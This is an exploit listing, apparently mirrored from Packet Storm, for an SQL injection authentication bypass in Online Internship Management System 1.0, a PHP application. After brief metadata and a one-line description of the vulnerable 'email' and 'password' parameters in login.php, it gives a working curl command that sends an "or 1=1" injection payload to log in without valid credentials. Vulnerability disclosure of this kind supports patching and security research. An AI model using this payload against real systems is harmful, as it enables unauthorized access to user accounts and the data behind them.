Share
## https://sploitus.com/exploit?id=PACKETSTORM:161412
# Exploit Title: Online Internship Management System 1.0 - 'email' SQL injection Auth Bypass  
# Date: 16-02-2021  
# Exploit Author: Christian Vierschilling  
# Vendor Homepage: https://www.sourcecodester.com  
# Software Link: https://www.sourcecodester.com/php/14712/online-internship-management-system-phpmysqli-full-source-code.html  
# Version: 1.0  
# Tested on: PHP 7.4.14, Linux x64_x86  
  
  
# --- Description --- #  
  
The application contains sql injections in the parameters 'email' and 'password' in the file 'login.php'.   
  
# --- Proof of concept --- #  
  
Curl request for authentication bypass via sql injection in parameter 'email':  
  
curl http://x.x.x.x/internship/login.php --data "email='%20or%201=1;#&password=none&login="